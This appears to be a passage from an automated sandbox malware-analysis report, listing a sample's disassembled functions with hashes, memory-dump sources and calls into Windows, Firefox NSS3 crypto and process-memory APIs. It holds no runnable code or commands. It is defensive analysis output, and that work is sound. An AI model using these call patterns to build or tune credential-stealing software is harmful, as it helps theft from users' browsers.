                                                                                                                                                                                                                              • Opcode ID: a6d3e81b5e0a47366b1d66f0d652f812c2c9b57c2a3c884fe078071e758bb68d
                                                                                                                                                                                                                              • Instruction ID: c8123d1b85341618edaf8723fc80ac75c3145ec2a69d0c62aa1455ab1685856f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6d3e81b5e0a47366b1d66f0d652f812c2c9b57c2a3c884fe078071e758bb68d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8851D9B5D012015FFB109F64DC81AAB37ACEF29218F191024EC199BB52FB31ED1987A2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(6C9A2D7C,6C979192,?), ref: 6C9A248E
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02B80138), ref: 6C9A24A2
                                                                                                                                                                                                                              • memset.VCRUNTIME140(6C9A2D7C,00000020,6C9A2D5C), ref: 6C9A250E
                                                                                                                                                                                                                              • memset.VCRUNTIME140(6C9A2D9C,00000020,6C9A2D7C), ref: 6C9A2535
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000020,?), ref: 6C9A255C
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000020,?), ref: 6C9A2583
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C9A2594
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C9A25AF
                                                                                                                                                                                                                                • Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$Value$CriticalEnterErrorSectionUnlock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2972906980-0
                                                                                                                                                                                                                              • Opcode ID: 440438ccbabb3cdb509769b592e70e45ff6ce27c38fe8afa7ec7e90d9427a7ad
                                                                                                                                                                                                                              • Instruction ID: 89e234ad136d7f085e22eb0eb3c5a112eb0105b1f40d604b650513da65f27668
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 440438ccbabb3cdb509769b592e70e45ff6ce27c38fe8afa7ec7e90d9427a7ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 684112B1E007425BEB049FB5CC987B937B8FB59308F146628DC09D7A51F770E586C291
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6C9A05DA
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 6C9A060C
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6C9A0629
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 6C9A066F
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6C9A068C
                                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6C9A06AA
                                                                                                                                                                                                                              • PK11_GetNextSafe.NSS3 ref: 6C9A06C3
                                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6C9A06F9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1593870348-0
                                                                                                                                                                                                                              • Opcode ID: 2844c063b1790ac861b64fd1927032987decc7b9ec3aa1b6b15353e8033500d0
                                                                                                                                                                                                                              • Instruction ID: ece1f0afeac1ab2e8c3a1eccfa78059e3d42dd716f17ec224a6c1cf869dcc988
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2844c063b1790ac861b64fd1927032987decc7b9ec3aa1b6b15353e8033500d0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6513AB4A05746CFDB00DFA9C48466AFBF4FF54308F109A29D89A9B711EB30E485CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C9AA4A6
                                                                                                                                                                                                                                • Part of subcall function 6C9B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9B08B4
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6C9AA4EC
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
                                                                                                                                                                                                                                • Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C9AA527
                                                                                                                                                                                                                              • memcmp.VCRUNTIME140(00000006,?,?), ref: 6C9AA56D
                                                                                                                                                                                                                              • memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C9AA583
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C9AA596
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C9AA5A4
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9AA5B6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906949479-0
                                                                                                                                                                                                                              • Opcode ID: ceee59aa7d7d68d200b221148be9d97fa6298650f774ba4233a5ced0cce409a7
                                                                                                                                                                                                                              • Instruction ID: 6b18e5ad76b4209057d443312be9f245ccbd0020c229388a02eab118d584d5c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ceee59aa7d7d68d200b221148be9d97fa6298650f774ba4233a5ced0cce409a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B410671A003429FDB10CFD9CC44B9EBBB5AF50318F14C468D8695BB42EB31E91ACBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C94670B
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C942B2C), ref: 6C94675E
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C94678E
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C942B2C), ref: 6C9467E1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                              • String ID: winClose$winUnmapfile1$winUnmapfile2
                                                                                                                                                                                                                              • API String ID: 3168844106-373099266
                                                                                                                                                                                                                              • Opcode ID: 561de812155b939246c10dec456a570423b264e5af1cc37d4070d97ef17b5270
                                                                                                                                                                                                                              • Instruction ID: ac42309672d1fb890c7ed40c54e2050c6dae76cbc635b1efb30e048d4a1a16e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 561de812155b939246c10dec456a570423b264e5af1cc37d4070d97ef17b5270
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6A18DB6B41312CBDF0C9F64E898A6D3BB4BF06715B14C068E906DB750DB38E852CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00413BDF
                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413C0D
                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5
                                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413D73
                                                                                                                                                                                                                                • Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                                                                                                                                              • String ID: @$Z>A
                                                                                                                                                                                                                              • API String ID: 2950663791-2427737632
                                                                                                                                                                                                                              • Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                              • Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C99AB3E,?,?,?), ref: 6C99AC35
                                                                                                                                                                                                                                • Part of subcall function 6C97CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C97CF16
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C99AB3E,?,?,?), ref: 6C99AC55
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C
                                                                                                                                                                                                                              • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C99AB3E,?,?), ref: 6C99AC70
                                                                                                                                                                                                                                • Part of subcall function 6C97E300: TlsGetValue.KERNEL32 ref: 6C97E33C
                                                                                                                                                                                                                                • Part of subcall function 6C97E300: EnterCriticalSection.KERNEL32(?), ref: 6C97E350
                                                                                                                                                                                                                                • Part of subcall function 6C97E300: PR_Unlock.NSS3(?), ref: 6C97E5BC
                                                                                                                                                                                                                                • Part of subcall function 6C97E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C97E5CA
                                                                                                                                                                                                                                • Part of subcall function 6C97E300: TlsGetValue.KERNEL32 ref: 6C97E5F2
                                                                                                                                                                                                                                • Part of subcall function 6C97E300: EnterCriticalSection.KERNEL32(?), ref: 6C97E606
                                                                                                                                                                                                                                • Part of subcall function 6C97E300: PORT_Alloc_Util.NSS3(?), ref: 6C97E613
                                                                                                                                                                                                                              • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C99AC92
                                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C99AB3E), ref: 6C99ACD7
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6C99AD10
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C99AD2B
                                                                                                                                                                                                                                • Part of subcall function 6C97F360: TlsGetValue.KERNEL32(00000000,?,6C99A904,?), ref: 6C97F38B
                                                                                                                                                                                                                                • Part of subcall function 6C97F360: EnterCriticalSection.KERNEL32(?,?,?,6C99A904,?), ref: 6C97F3A0
                                                                                                                                                                                                                                • Part of subcall function 6C97F360: PR_Unlock.NSS3(?,?,?,?,6C99A904,?), ref: 6C97F3D3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2926855110-0
                                                                                                                                                                                                                              • Opcode ID: 357ca8a577a36fa28a74ca0f1d855a39c80af0c58e4af7417f3c76e4a3688025
                                                                                                                                                                                                                              • Instruction ID: 4eb227551249b42b2ce2448a24f6de0b9c9d1b2cbdb834942bafc4dfddc1cc8a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357ca8a577a36fa28a74ca0f1d855a39c80af0c58e4af7417f3c76e4a3688025
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 343127B1E006165FEB008F699C409AF77BAEF94328B1C8528E814ABB40FF31DD1587A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6C978C7C
                                                                                                                                                                                                                                • Part of subcall function 6CA19DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DC6
                                                                                                                                                                                                                                • Part of subcall function 6CA19DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DD1
                                                                                                                                                                                                                                • Part of subcall function 6CA19DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA19DED
                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C978CB0
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C978CD1
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C978CE5
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C978D2E
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C978D62
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C978D93
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3131193014-0
                                                                                                                                                                                                                              • Opcode ID: 3d8f059e2aeb9a7b1a02ce213118579e3fd37d1fc10b96ac9732ca738e9b54c0
                                                                                                                                                                                                                              • Instruction ID: 29a27075a03c9308638e0b7a322df9d80d17f01c71539c824a37fb31860ea721
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d8f059e2aeb9a7b1a02ce213118579e3fd37d1fc10b96ac9732ca738e9b54c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8314371A02202ABE7289F68CD407AAB7B4FF24318F14013AEA1967B50D770E925C7E5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C9645B5
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C9645C9
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C
                                                                                                                                                                                                                              • memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C9645E6
                                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C9645F8
                                                                                                                                                                                                                                • Part of subcall function 6C9AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C9A8D2D,?,00000000,?), ref: 6C9AFB85
                                                                                                                                                                                                                                • Part of subcall function 6C9AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C9AFBB1
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C964647
                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CA7A0F4,?), ref: 6C96468C
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C9646A1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1594507116-0
                                                                                                                                                                                                                              • Opcode ID: 614fdf7dfee342b1e1a8faa43ad9cc3a6bad7ac9aaeaf263e7434050cbbb3f96
                                                                                                                                                                                                                              • Instruction ID: 454ad07979a50453d462ede061c5f87ef40e56f9c13fee371d3b5b278889d478
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 614fdf7dfee342b1e1a8faa43ad9cc3a6bad7ac9aaeaf263e7434050cbbb3f96
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8931EAB1A003155BFF108E99DC61BAB36A8EB56318F004039D904EFBC1E775C8098BA6
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,?,6C967296,00000000), ref: 6C9A4487
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,6C967296,00000000), ref: 6C9A44A0
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,6C967296,00000000), ref: 6C9A44BB
                                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(?,?,?,?,6C967296,00000000), ref: 6C9A44DA
                                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,6C967296,00000000), ref: 6C9A4530
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,6C967296,00000000), ref: 6C9A453C
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3 ref: 6C9A454F
                                                                                                                                                                                                                                • Part of subcall function 6C98CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C96B1EE,D958E836,?,6C9A51C5), ref: 6C98CAFA
                                                                                                                                                                                                                                • Part of subcall function 6C98CAA0: PR_UnloadLibrary.NSS3(?,6C9A51C5), ref: 6C98CB09
                                                                                                                                                                                                                              Memory Dump Source
